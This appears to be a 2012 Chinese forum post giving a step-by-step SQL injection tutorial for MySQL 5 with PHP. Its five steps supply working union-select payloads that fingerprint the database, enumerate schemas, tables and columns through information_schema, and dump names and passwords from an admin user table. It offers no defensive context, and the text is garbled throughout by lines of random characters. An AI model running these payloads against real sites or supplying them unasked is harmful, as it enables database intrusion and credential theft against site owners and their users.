( M4 _9 W5 l- t8 Z教程内容:Mysql 5+php 注入% ~+ G [' }% p" f% s3 Y1 a
8 ]* f, q7 W3 [. s3 n4 d- q3 M
?: R- n# r7 ^: Z. s( n" w+ K3 s+ k1 B" X8 j# B
一.查看MYSQL基本信息(库名,版本,用户)
6 X0 K3 t; S; U, L8 K
2 h2 _5 Y0 v qand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*9 J { `/ m, A5 U2 M8 V
4 A) y; i0 a" P1 e二.查数据库
7 n, e0 N' |& d/ {% ?, G% R7 J4 I- l( ~! H2 Z9 u1 N( c
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
: P1 z7 y3 A7 z; elimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
9 f ?% D( l: z" J
* E2 f2 h- t2 y7 V% I三.暴表
: ~' a; w8 h$ z0 V" {8 }
9 Y) _* b6 [ f& }4 R9 D iand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
9 N+ F% P* y$ ?4 k* @$ N. o
; _! c/ |; s, x ylimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
+ L1 A9 \& N% [/ S" s% W6 \: i A
1 h. u+ c# B7 _6 ?5 ^& e2 j四.暴字段
2 ]" _7 H5 b8 n( M1 P* W6 Z
" g: |/ y2 Z/ x5 ?, m1 kand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*7 i' r) q6 S5 V% ^+ f+ N
. q7 t1 L. L. l8 b! o- Y v4 Q. B
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
7 S$ R, U7 w: W, ^) G) U! v3 ^8 q Y! }; I
五.暴数据
5 [ g" }. o, ^5 j( a( C7 E! z2 n% ^
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*. a- }( S% m6 [5 Y" k0 {
5 l- [2 H1 s. R0 [) {- V }2 `
) U+ i" Z6 ~1 N; p4 {& V: v
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
$ h' X5 L/ L/ a4 Y6 P. k9 m, l& E |
发表于 2012-9-13 16:27:53
收藏
支持
反对